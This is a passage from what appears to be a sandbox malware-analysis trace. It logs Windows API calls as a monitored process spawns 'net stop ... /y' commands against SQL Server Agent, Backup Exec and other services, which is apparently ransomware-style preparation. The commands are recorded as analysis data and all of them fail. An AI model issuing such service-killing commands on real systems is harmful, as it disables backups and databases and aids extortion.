_String2="SntpService") returned -16 [0197.173] _wcsicmp (_String1="continue", _String2="SntpService") returned -16 [0197.173] _wcsicmp (_String1="cont", _String2="SntpService") returned -16 [0197.173] _wcsicmp (_String1="file", _String2="SntpService") returned -13 [0197.173] _wcsicmp (_String1="files", _String2="SntpService") returned -13 [0197.173] _wcsicmp (_String1="group", _String2="SntpService") returned -12 [0197.173] _wcsicmp (_String1="groups", _String2="SntpService") returned -12 [0197.173] _wcsicmp (_String1="help", _String2="SntpService") returned -11 [0197.173] _wcsicmp (_String1="helpmsg", _String2="SntpService") returned -11 [0197.173] _wcsicmp (_String1="localgroup", _String2="SntpService") returned -7 [0197.173] _wcsicmp (_String1="pause", _String2="SntpService") returned -3 [0197.173] _wcsicmp (_String1="session", _String2="SntpService") returned -9 [0197.173] _wcsicmp (_String1="sessions", _String2="SntpService") returned -9 [0197.173] _wcsicmp (_String1="sess", _String2="SntpService") returned -9 [0197.173] _wcsicmp (_String1="share", _String2="SntpService") returned -6 [0197.173] _wcsicmp (_String1="start", _String2="SntpService") returned 6 [0197.173] _wcsicmp (_String1="stats", _String2="SntpService") returned 6 [0197.173] _wcsicmp (_String1="statistics", _String2="SntpService") returned 6 [0197.173] _wcsicmp (_String1="stop", _String2="SntpService") returned 6 [0197.173] _wcsicmp (_String1="time", _String2="SntpService") returned 1 [0197.173] _wcsicmp (_String1="user", _String2="SntpService") returned 2 [0197.173] _wcsicmp (_String1="users", _String2="SntpService") returned 2 [0197.174] _wcsicmp (_String1="msg", _String2="SntpService") returned -6 [0197.174] _wcsicmp (_String1="messenger", _String2="SntpService") returned -6 [0197.174] _wcsicmp (_String1="receiver", _String2="SntpService") returned -1 [0197.174] _wcsicmp (_String1="rcv", _String2="SntpService") returned -1 [0197.174] _wcsicmp (_String1="netpopup", _String2="SntpService") returned -5 [0197.174] _wcsicmp (_String1="redirector", _String2="SntpService") returned -1 [0197.174] _wcsicmp (_String1="redir", _String2="SntpService") returned -1 [0197.174] _wcsicmp (_String1="rdr", _String2="SntpService") returned -1 [0197.174] _wcsicmp (_String1="workstation", _String2="SntpService") returned 4 [0197.174] _wcsicmp (_String1="work", _String2="SntpService") returned 4 [0197.174] _wcsicmp (_String1="wksta", _String2="SntpService") returned 4 [0197.174] _wcsicmp (_String1="prdr", _String2="SntpService") returned -3 [0197.174] _wcsicmp (_String1="devrdr", _String2="SntpService") returned -15 [0197.174] _wcsicmp (_String1="lanmanworkstation", _String2="SntpService") returned -7 [0197.174] _wcsicmp (_String1="server", _String2="SntpService") returned -9 [0197.174] _wcsicmp (_String1="svr", _String2="SntpService") returned 8 [0197.174] _wcsicmp (_String1="srv", _String2="SntpService") returned 4 [0197.174] _wcsicmp (_String1="lanmanserver", _String2="SntpService") returned -7 [0197.174] _wcsicmp (_String1="alerter", _String2="SntpService") returned -18 [0197.174] _wcsicmp (_String1="netlogon", _String2="SntpService") returned -5 [0197.174] _wcsupr (in: _String="SntpService" | out: _String="SNTPSERVICE") returned="SNTPSERVICE" [0197.174] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2054d0 [0197.177] GetServiceKeyNameW (in: hSCManager=0x2054d0, lpDisplayName="SNTPSERVICE", lpServiceName=0xdaaaf0, lpcchBuffer=0xefe84 | out: lpServiceName="", lpcchBuffer=0xefe84) returned 0 [0197.177] _wcsicmp (_String1="msg", _String2="SNTPSERVICE") returned -6 [0197.177] _wcsicmp (_String1="messenger", _String2="SNTPSERVICE") returned -6 [0197.177] _wcsicmp (_String1="receiver", _String2="SNTPSERVICE") returned -1 [0197.177] _wcsicmp (_String1="rcv", _String2="SNTPSERVICE") returned -1 [0197.177] _wcsicmp (_String1="redirector", _String2="SNTPSERVICE") returned -1 [0197.177] _wcsicmp (_String1="redir", _String2="SNTPSERVICE") returned -1 [0197.177] _wcsicmp (_String1="rdr", _String2="SNTPSERVICE") returned -1 [0197.177] _wcsicmp (_String1="workstation", _String2="SNTPSERVICE") returned 4 [0197.177] _wcsicmp (_String1="work", _String2="SNTPSERVICE") returned 4 [0197.178] _wcsicmp (_String1="wksta", _String2="SNTPSERVICE") returned 4 [0197.178] _wcsicmp (_String1="prdr", _String2="SNTPSERVICE") returned -3 [0197.178] _wcsicmp (_String1="devrdr", _String2="SNTPSERVICE") returned -15 [0197.178] _wcsicmp (_String1="lanmanworkstation", _String2="SNTPSERVICE") returned -7 [0197.178] _wcsicmp (_String1="server", _String2="SNTPSERVICE") returned -9 [0197.178] _wcsicmp (_String1="svr", _String2="SNTPSERVICE") returned 8 [0197.178] _wcsicmp (_String1="srv", _String2="SNTPSERVICE") returned 4 [0197.178] _wcsicmp (_String1="lanmanserver", _String2="SNTPSERVICE") returned -7 [0197.178] _wcsicmp (_String1="alerter", _String2="SNTPSERVICE") returned -18 [0197.178] _wcsicmp (_String1="netlogon", _String2="SNTPSERVICE") returned -5 [0197.178] NetServiceControl (in: servername=0x0, service="SNTPSERVICE", opcode=0x0, arg=0x0, bufptr=0xefe80 | out: bufptr=0xefe80) returned 0x889 [0197.179] wcscpy_s (in: _Destination=0xdaa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0197.179] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0197.179] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xdab338, nSize=0x800, Arguments=0xda9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0197.180] GetFileType (hFile=0x26c) returned 0x3 [0197.180] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x204000 [0197.180] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x204000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0197.181] WriteFile (in: hFile=0x26c, lpBuffer=0x204000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xefdc0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefdc0, lpOverlapped=0x0) returned 0 [0197.181] LocalFree (hMem=0x204000) returned 0x0 [0197.181] GetFileType (hFile=0x26c) returned 0x3 [0197.181] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2062a8 [0197.181] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2062a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n ", lpUsedDefaultChar=0x0) returned 2 [0197.181] WriteFile (in: hFile=0x26c, lpBuffer=0x2062a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xefdc0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefdc0, lpOverlapped=0x0) returned 0 [0197.181] LocalFree (hMem=0x2062a8) returned 0x0 [0197.181] _ultow (in: _Dest=0x889, _Radix=982512 | out: _Dest=0x889) returned="2185" [0197.181] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xdab338, nSize=0x800, Arguments=0xda9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0197.181] GetFileType (hFile=0x26c) returned 0x3 [0197.181] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2062a8 [0197.181] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2062a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0197.181] WriteFile (in: hFile=0x26c, lpBuffer=0x2062a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xefdcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefdcc, lpOverlapped=0x0) returned 0 [0197.181] LocalFree (hMem=0x2062a8) returned 0x0 [0197.181] GetFileType (hFile=0x26c) returned 0x3 [0197.181] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2062a8 [0197.181] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2062a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n ", lpUsedDefaultChar=0x0) returned 2 [0197.181] WriteFile (in: hFile=0x26c, lpBuffer=0x2062a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xefdcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xefdcc, lpOverlapped=0x0) returned 0 [0197.181] LocalFree (hMem=0x2062a8) returned 0x0 [0197.182] NetApiBufferFree (Buffer=0x201c70) returned 0x0 [0197.182] NetApiBufferFree (Buffer=0x201c88) returned 0x0 [0197.182] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SntpService /y" [0197.182] exit (_Code=2) Process: id = "132" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5dd0e000" os_pid = "0xa08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLSERVERAGENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 305 os_tid = 0xa14 Process: id = "133" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x51524000" os_pid = "0xa24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "132" os_parent_pid = "0xa08" cmd_line = "C:\\Windows\\system32\\net1 stop SQLSERVERAGENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 306 os_tid = 0x9fc [0197.379] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36fca8 | out: lpSystemTimeAsFileTime=0x36fca8*(dwLowDateTime=0x3ed69ea0, dwHighDateTime=0x1d57a87)) [0197.379] GetCurrentProcessId () returned 0xa24 [0197.380] GetCurrentThreadId () returned 0x9fc [0197.380] GetTickCount () returned 0x116b01e [0197.380] QueryPerformanceCounter (in: lpPerformanceCount=0x36fca0 | out: lpPerformanceCount=0x36fca0*=31766423428) returned 1 [0197.380] GetModuleHandleA (lpModuleName=0x0) returned 0xe0000 [0197.380] __set_app_type (_Type=0x1) [0197.380] __p__fmode () returned 0x74eb31f4 [0197.380] __p__commode () returned 0x74eb31fc [0197.380] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xeffe6) returned 0x0 [0197.380] __getmainargs (in: _Argc=0xf9064, _Argv=0xf906c, _Env=0xf9068, _DoWildCard=0, _StartInfo=0xf9024 | out: _Argc=0xf9064, _Argv=0xf906c, _Env=0xf9068) returned 0 [0197.380] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0197.380] GetConsoleOutputCP () returned 0x1b5 [0197.381] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf9080 | out: lpCPInfo=0xf9080) returned 1 [0197.381] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.383] sprintf_s (in: _DstBuf=0x36fc60, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0197.384] setlocale (category=0, locale=".437") returned="English_United States.437" [0197.385] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0197.385] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0197.386] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLSERVERAGENT /y" [0197.386] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x36fa2c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0197.386] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x70) returned 0x703c18 [0197.386] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0197.386] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36fc30 | out: Buffer=0x36fc30*=0x701c78) returned 0x0 [0197.386] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x36fc30 | out: Buffer=0x36fc30*=0x701c90) returned 0x0 [0197.386] _fileno (_File=0x74eb2900) returned -2 [0197.386] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0197.386] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0197.386] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0197.386] _wcsicmp (_String1="config", _String2="stop") returned -16 [0197.386] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0197.386] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0197.386] _wcsicmp (_String1="file", _String2="stop") returned -13 [0197.386] _wcsicmp (_String1="files", _String2="stop") returned -13 [0197.386] _wcsicmp (_String1="group", _String2="stop") returned -12 [0197.386] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0197.386] _wcsicmp (_String1="help", _String2="stop") returned -11 [0197.386] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0197.387] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0197.387] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0197.387] _wcsicmp (_String1="session", _String2="stop") returned -15 [0197.387] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0197.387] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0197.387] _wcsicmp (_String1="share", _String2="stop") returned -12 [0197.387] _wcsicmp (_String1="start", _String2="stop") returned -14 [0197.387] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0197.387] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0197.387] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0197.387] _wcsicmp (_String1="accounts", _String2="SQLSERVERAGENT") returned -18 [0197.387] _wcsicmp (_String1="computer", _String2="SQLSERVERAGENT") returned -16 [0197.387] _wcsicmp (_String1="config", _String2="SQLSERVERAGENT") returned -16 [0197.387] _wcsicmp (_String1="continue", _String2="SQLSERVERAGENT") returned -16 [0197.387] _wcsicmp (_String1="cont", _String2="SQLSERVERAGENT") returned -16 [0197.387] _wcsicmp (_String1="file", _String2="SQLSERVERAGENT") returned -13 [0197.387] _wcsicmp (_String1="files", _String2="SQLSERVERAGENT") returned -13 [0197.387] _wcsicmp (_String1="group", _String2="SQLSERVERAGENT") returned -12 [0197.387] _wcsicmp (_String1="groups", _String2="SQLSERVERAGENT") returned -12 [0197.387] _wcsicmp (_String1="help", _String2="SQLSERVERAGENT") returned -11 [0197.387] _wcsicmp (_String1="helpmsg", _String2="SQLSERVERAGENT") returned -11 [0197.387] _wcsicmp (_String1="localgroup", _String2="SQLSERVERAGENT") returned -7 [0197.387] _wcsicmp (_String1="pause", _String2="SQLSERVERAGENT") returned -3 [0197.387] _wcsicmp (_String1="session", _String2="SQLSERVERAGENT") returned -12 [0197.387] _wcsicmp (_String1="sessions", _String2="SQLSERVERAGENT") returned -12 [0197.387] _wcsicmp (_String1="sess", _String2="SQLSERVERAGENT") returned -12 [0197.387] _wcsicmp (_String1="share", _String2="SQLSERVERAGENT") returned -9 [0197.387] _wcsicmp (_String1="start", _String2="SQLSERVERAGENT") returned 3 [0197.387] _wcsicmp (_String1="stats", _String2="SQLSERVERAGENT") returned 3 [0197.387] _wcsicmp (_String1="statistics", _String2="SQLSERVERAGENT") returned 3 [0197.387] _wcsicmp (_String1="stop", _String2="SQLSERVERAGENT") returned 3 [0197.387] _wcsicmp (_String1="time", _String2="SQLSERVERAGENT") returned 1 [0197.387] _wcsicmp (_String1="user", _String2="SQLSERVERAGENT") returned 2 [0197.387] _wcsicmp (_String1="users", _String2="SQLSERVERAGENT") returned 2 [0197.387] _wcsicmp (_String1="msg", _String2="SQLSERVERAGENT") returned -6 [0197.387] _wcsicmp (_String1="messenger", _String2="SQLSERVERAGENT") returned -6 [0197.387] _wcsicmp (_String1="receiver", _String2="SQLSERVERAGENT") returned -1 [0197.388] _wcsicmp (_String1="rcv", _String2="SQLSERVERAGENT") returned -1 [0197.388] _wcsicmp (_String1="netpopup", _String2="SQLSERVERAGENT") returned -5 [0197.388] _wcsicmp (_String1="redirector", _String2="SQLSERVERAGENT") returned -1 [0197.388] _wcsicmp (_String1="redir", _String2="SQLSERVERAGENT") returned -1 [0197.388] _wcsicmp (_String1="rdr", _String2="SQLSERVERAGENT") returned -1 [0197.388] _wcsicmp (_String1="workstation", _String2="SQLSERVERAGENT") returned 4 [0197.388] _wcsicmp (_String1="work", _String2="SQLSERVERAGENT") returned 4 [0197.388] _wcsicmp (_String1="wksta", _String2="SQLSERVERAGENT") returned 4 [0197.388] _wcsicmp (_String1="prdr", _String2="SQLSERVERAGENT") returned -3 [0197.388] _wcsicmp (_String1="devrdr", _String2="SQLSERVERAGENT") returned -15 [0197.388] _wcsicmp (_String1="lanmanworkstation", _String2="SQLSERVERAGENT") returned -7 [0197.388] _wcsicmp (_String1="server", _String2="SQLSERVERAGENT") returned -12 [0197.388] _wcsicmp (_String1="svr", _String2="SQLSERVERAGENT") returned 5 [0197.388] _wcsicmp (_String1="srv", _String2="SQLSERVERAGENT") returned 1 [0197.388] _wcsicmp (_String1="lanmanserver", _String2="SQLSERVERAGENT") returned -7 [0197.388] _wcsicmp (_String1="alerter", _String2="SQLSERVERAGENT") returned -18 [0197.388] _wcsicmp (_String1="netlogon", _String2="SQLSERVERAGENT") returned -5 [0197.388] _wcsupr (in: _String="SQLSERVERAGENT" | out: _String="SQLSERVERAGENT") returned="SQLSERVERAGENT" [0197.388] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7054d8 [0197.407] GetServiceKeyNameW (in: hSCManager=0x7054d8, lpDisplayName="SQLSERVERAGENT", lpServiceName=0xfaaf0, lpcchBuffer=0x36fbcc | out: lpServiceName="", lpcchBuffer=0x36fbcc) returned 0 [0197.407] _wcsicmp (_String1="msg", _String2="SQLSERVERAGENT") returned -6 [0197.407] _wcsicmp (_String1="messenger", _String2="SQLSERVERAGENT") returned -6 [0197.407] _wcsicmp (_String1="receiver", _String2="SQLSERVERAGENT") returned -1 [0197.408] _wcsicmp (_String1="rcv", _String2="SQLSERVERAGENT") returned -1 [0197.408] _wcsicmp (_String1="redirector", _String2="SQLSERVERAGENT") returned -1 [0197.408] _wcsicmp (_String1="redir", _String2="SQLSERVERAGENT") returned -1 [0197.408] _wcsicmp (_String1="rdr", _String2="SQLSERVERAGENT") returned -1 [0197.408] _wcsicmp (_String1="workstation", _String2="SQLSERVERAGENT") returned 4 [0197.408] _wcsicmp (_String1="work", _String2="SQLSERVERAGENT") returned 4 [0197.408] _wcsicmp (_String1="wksta", _String2="SQLSERVERAGENT") returned 4 [0197.408] _wcsicmp (_String1="prdr", _String2="SQLSERVERAGENT") returned -3 [0197.408] _wcsicmp (_String1="devrdr", _String2="SQLSERVERAGENT") returned -15 [0197.408] _wcsicmp (_String1="lanmanworkstation", _String2="SQLSERVERAGENT") returned -7 [0197.408] _wcsicmp (_String1="server", _String2="SQLSERVERAGENT") returned -12 [0197.408] _wcsicmp (_String1="svr", _String2="SQLSERVERAGENT") returned 5 [0197.408] _wcsicmp (_String1="srv", _String2="SQLSERVERAGENT") returned 1 [0197.408] _wcsicmp (_String1="lanmanserver", _String2="SQLSERVERAGENT") returned -7 [0197.408] _wcsicmp (_String1="alerter", _String2="SQLSERVERAGENT") returned -18 [0197.408] _wcsicmp (_String1="netlogon", _String2="SQLSERVERAGENT") returned -5 [0197.408] NetServiceControl (in: servername=0x0, service="SQLSERVERAGENT", opcode=0x0, arg=0x0, bufptr=0x36fbc8 | out: bufptr=0x36fbc8) returned 0x889 [0197.409] wcscpy_s (in: _Destination=0xfa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0197.409] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0197.410] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xfb338, nSize=0x800, Arguments=0xf9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0197.411] GetFileType (hFile=0x26c) returned 0x3 [0197.411] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x704008 [0197.411] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x704008, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0197.411] WriteFile (in: hFile=0x26c, lpBuffer=0x704008, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x36fb08, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36fb08, lpOverlapped=0x0) returned 0 [0197.411] LocalFree (hMem=0x704008) returned 0x0 [0197.411] GetFileType (hFile=0x26c) returned 0x3 [0197.411] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7062b0 [0197.411] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7062b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0197.411] WriteFile (in: hFile=0x26c, lpBuffer=0x7062b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36fb08, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36fb08, lpOverlapped=0x0) returned 0 [0197.411] LocalFree (hMem=0x7062b0) returned 0x0 [0197.411] _ultow (in: _Dest=0x889, _Radix=3603256 | out: _Dest=0x889) returned="2185" [0197.411] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xfb338, nSize=0x800, Arguments=0xf9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0197.411] GetFileType (hFile=0x26c) returned 0x3 [0197.411] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7062b0 [0197.411] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7062b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0197.411] WriteFile (in: hFile=0x26c, lpBuffer=0x7062b0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x36fb14, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36fb14, lpOverlapped=0x0) returned 0 [0197.411] LocalFree (hMem=0x7062b0) returned 0x0 [0197.411] GetFileType (hFile=0x26c) returned 0x3 [0197.412] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7062b0 [0197.412] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7062b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\np", lpUsedDefaultChar=0x0) returned 2 [0197.412] WriteFile (in: hFile=0x26c, lpBuffer=0x7062b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36fb14, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x36fb14, lpOverlapped=0x0) returned 0 [0197.412] LocalFree (hMem=0x7062b0) returned 0x0 [0197.412] NetApiBufferFree (Buffer=0x701c78) returned 0x0 [0197.412] NetApiBufferFree (Buffer=0x701c90) returned 0x0 [0197.412] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLSERVERAGENT /y" [0197.412] exit (_Code=2) Process: id = "134" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x14913000" os_pid = "0x898" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop BackupExecManagementService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 307 os_tid = 0x8cc Process: id = "135" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x501b8000" os_pid = "0x974" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "134" os_parent_pid = "0x898" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecManagementService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 308 os_tid = 0x8d0 [0197.589] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29f874 | out: lpSystemTimeAsFileTime=0x29f874*(dwLowDateTime=0x3ef59080, dwHighDateTime=0x1d57a87)) [0197.589] GetCurrentProcessId () returned 0x974 [0197.589] GetCurrentThreadId () returned 0x8d0 [0197.589] GetTickCount () returned 0x116b0e8 [0197.589] QueryPerformanceCounter (in: lpPerformanceCount=0x29f86c | out: lpPerformanceCount=0x29f86c*=31787359431) returned 1 [0197.589] GetModuleHandleA (lpModuleName=0x0) returned 0x770000 [0197.589] __set_app_type (_Type=0x1) [0197.589] __p__fmode () returned 0x74eb31f4 [0197.589] __p__commode () returned 0x74eb31fc [0197.589] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x77ffe6) returned 0x0 [0197.590] __getmainargs (in: _Argc=0x789064, _Argv=0x78906c, _Env=0x789068, _DoWildCard=0, _StartInfo=0x789024 | out: _Argc=0x789064, _Argv=0x78906c, _Env=0x789068) returned 0 [0197.590] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0197.590] GetConsoleOutputCP () returned 0x1b5 [0197.590] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x789080 | out: lpCPInfo=0x789080) returned 1 [0197.590] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.593] sprintf_s (in: _DstBuf=0x29f82c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0197.593] setlocale (category=0, locale=".437") returned="English_United States.437" [0197.595] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0197.595] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0197.595] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecManagementService /y" [0197.595] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29f5f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0197.595] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x8a) returned 0x5b4c00 [0197.595] _wcsnicmp 